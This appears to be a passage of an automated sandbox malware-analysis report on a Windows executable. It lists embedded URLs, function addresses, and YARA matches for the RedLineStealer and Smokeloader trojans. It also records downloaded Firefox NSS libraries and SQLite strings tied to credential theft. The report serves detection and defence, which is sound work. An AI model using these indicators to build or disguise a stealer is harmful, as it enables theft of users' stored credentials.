Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: z2kQkLtyJW.exe, z2kQkLtyJW.exe, 00000000.00000002.2287579030.000000006CFDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287476722.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FBFHJJJD.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FBFHJJJD.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FBFHJJJD.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FBFHJJJD.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FBFHJJJD.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FBFHJJJD.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FBFHJJJD.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://support.mozilla.org
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp, z2kQkLtyJW.exe, 00000000.00000003.1999235241.00000000231DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp, z2kQkLtyJW.exe, 00000000.00000003.1999235241.00000000231DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: FBFHJJJD.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: FBFHJJJD.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: z2kQkLtyJW.exe, 00000000.00000003.2035329476.00000000293FF000.00000004.00000020.00020000.00000000.sdmp, KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: z2kQkLtyJW.exe, 00000000.00000003.2035329476.00000000293FF000.00000004.00000020.00020000.00000000.sdmp, KFHCAEGCBFHJDGCBFHDAFBAFII.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

barindex
Source: 00000000.00000002.2269733901.0000000002D87000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6CF8ED10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFCB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CFCB700
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFCB8C0 rand_s,NtQueryVirtualMemory, 0_2_6CFCB8C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFCB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CFCB910
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CF6F280
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA6CF0 0_2_6CFA6CF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6D4E0 0_2_6CF6D4E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8D4D0 0_2_6CF8D4D0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF764C0 0_2_6CF764C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC34A0 0_2_6CFC34A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFCC4A0 0_2_6CFCC4A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF76C80 0_2_6CF76C80
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD545C 0_2_6CFD545C
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF75440 0_2_6CF75440
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD542B 0_2_6CFD542B
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA5C10 0_2_6CFA5C10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFB2C10 0_2_6CFB2C10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFDAC00 0_2_6CFDAC00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC85F0 0_2_6CFC85F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA0DD0 0_2_6CFA0DD0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF635A0 0_2_6CF635A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8ED10 0_2_6CF8ED10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF90512 0_2_6CF90512
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF7FD00 0_2_6CF7FD00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6BEF0 0_2_6CF6BEF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF7FEF0 0_2_6CF7FEF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD76E3 0_2_6CFD76E3
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC4EA0 0_2_6CFC4EA0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF85E90 0_2_6CF85E90
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFCE680 0_2_6CFCE680
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6C670 0_2_6CF6C670
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD6E63 0_2_6CFD6E63
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF89E50 0_2_6CF89E50
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA3E50 0_2_6CFA3E50
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFB2E4E 0_2_6CFB2E4E
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF84640 0_2_6CF84640
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC9E30 0_2_6CFC9E30
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA7E10 0_2_6CFA7E10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFB5600 0_2_6CFB5600
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF96FF0 0_2_6CF96FF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6DFE0 0_2_6CF6DFE0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFB77A0 0_2_6CFB77A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA7710 0_2_6CFA7710
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF79F00 0_2_6CF79F00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8C0E0 0_2_6CF8C0E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA58E0 0_2_6CFA58E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD50C7 0_2_6CFD50C7
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF960A0 0_2_6CF960A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFAF070 0_2_6CFAF070
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF88850 0_2_6CF88850
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8D850 0_2_6CF8D850
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFAB820 0_2_6CFAB820
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFB4820 0_2_6CFB4820
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF77810 0_2_6CF77810
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF9D9B0 0_2_6CF9D9B0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6C9A0 0_2_6CF6C9A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA5190 0_2_6CFA5190
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC2990 0_2_6CFC2990
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFBB970 0_2_6CFBB970
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFDB170 0_2_6CFDB170
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF7D960 0_2_6CF7D960
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF8A940 0_2_6CF8A940
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF81AF0 0_2_6CF81AF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFAE2F0 0_2_6CFAE2F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA8AC0 0_2_6CFA8AC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF7CAB0 0_2_6CF7CAB0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD2AB0 0_2_6CFD2AB0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF622A0 0_2_6CF622A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF94AA0 0_2_6CF94AA0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFDBA90 0_2_6CFDBA90
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFA9A60 0_2_6CFA9A60
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFD53C8 0_2_6CFD53C8
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF6F380 0_2_6CF6F380
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF7C370 0_2_6CF7C370
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF65340 0_2_6CF65340
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFAD320 0_2_6CFAD320
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D198D20 0_2_6D198D20
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D13AD50 0_2_6D13AD50
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0DED70 0_2_6D0DED70
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0A6D90 0_2_6D0A6D90
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D014DB0 0_2_6D014DB0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D19CDC0 0_2_6D19CDC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0D6C00 0_2_6D0D6C00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0EAC30 0_2_6D0EAC30
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D01AC60 0_2_6D01AC60
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D00ECC0 0_2_6D00ECC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D06ECD0 0_2_6D06ECD0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D016F10 0_2_6D016F10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D150F20 0_2_6D150F20
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D07EF40 0_2_6D07EF40
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0D2F70 0_2_6D0D2F70
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D158FB0 0_2_6D158FB0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D01EFB0 0_2_6D01EFB0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D010FE0 0_2_6D010FE0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0EEFF0 0_2_6D0EEFF0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0F0E20 0_2_6D0F0E20
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0AEE70 0_2_6D0AEE70
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D096E90 0_2_6D096E90
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D01AEC0 0_2_6D01AEC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0B0EC0 0_2_6D0B0EC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D066900 0_2_6D066900
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D048960 0_2_6D048960
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0A09A0 0_2_6D0A09A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0CA9A0 0_2_6D0CA9A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0D09B0 0_2_6D0D09B0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D12C9E0 0_2_6D12C9E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0449F0 0_2_6D0449F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D060820 0_2_6D060820
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D09A820 0_2_6D09A820
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0E4840 0_2_6D0E4840
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D1168E0 0_2_6D1168E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0B0BA0 0_2_6D0B0BA0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D018BAC 0_2_6D018BAC
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D116BE0 0_2_6D116BE0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0BEA00 0_2_6D0BEA00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0C8A30 0_2_6D0C8A30
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D08CA70 0_2_6D08CA70
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D08EA80 0_2_6D08EA80
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D158550 0_2_6D158550
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D068540 0_2_6D068540
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D114540 0_2_6D114540
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D072560 0_2_6D072560
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0B0570 0_2_6D0B0570
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0045B0 0_2_6D0045B0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0DA5E0 0_2_6D0DA5E0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D09E5F0 0_2_6D09E5F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D074420 0_2_6D074420
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D09A430 0_2_6D09A430
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D028460 0_2_6D028460
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D13A480 0_2_6D13A480
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0564D0 0_2_6D0564D0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0AA4D0 0_2_6D0AA4D0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D090700 0_2_6D090700
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D03A7D0 0_2_6D03A7D0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6CF9CBE8 appears 134 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6D039B10 appears 32 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6D19DAE0 appears 35 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6D033620 appears 39 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6D1909D0 appears 157 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: String function: 6CFA94D0 appears 90 times
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 2192
Source: z2kQkLtyJW.exe, 00000000.00000002.2287842668.000000006D1E5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs z2kQkLtyJW.exe
Source: z2kQkLtyJW.exe, 00000000.00000002.2287614011.000000006CFF2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs z2kQkLtyJW.exe
Source: z2kQkLtyJW.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2269733901.0000000002D87000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/33@0/1
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CFC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CFC7030
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3756
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\551d4ba0-5cb7-42c3-8b12-891ec816be80 Jump to behavior
Source: z2kQkLtyJW.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
